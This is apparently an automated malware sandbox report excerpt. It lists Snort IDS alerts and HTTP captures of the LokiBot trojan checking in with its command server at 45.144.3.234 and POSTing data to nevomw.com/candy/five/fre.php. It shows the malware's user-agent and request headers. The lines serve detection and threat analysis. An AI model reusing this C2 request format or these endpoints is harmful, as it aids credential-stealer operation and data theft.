                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49809 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49809
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49810 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49810
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49812 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49812
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49814 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49814
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49815 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49815
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49817 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49817
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49818 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49818
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49820 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49820 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49820 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49820 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49820
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49821 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49821 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49821 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49821 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49821
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49822 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49822 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49822 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49822 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49822
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49824 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49824 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49824 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49824 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49824
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49825 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49825 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49825 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49825 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49825
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49826 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49826 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49826 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49826 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49826
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49828 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49828 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49828 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49828 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49828
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49829 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49829 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49829 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49829 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49829
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49830 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49830 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49830 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49830 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49830
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49832 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49832 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49832 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49832 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49832
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49833 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49833 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49833 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49833 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49833
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49835 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49835 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49835 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49835 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49835
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49837 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49837 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49837 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49837 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49837
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49838 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49838 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49838 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49838 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49838
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49840 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49840 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49840 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49840 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 45.144.3.234:80 -> 192.168.2.6:49840
                    Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49841 -> 45.144.3.234:80
                    Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49841 -> 45.144.3.234:80
                    Source: Joe Sandbox ViewASN Name: ASBAXETRU ASBAXETRU
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 196Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 196Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
                    Source: global trafficHTTP traffic detected: POST /candy/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: nevomw.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F1D39DE6Content-Length: 169Connection: close
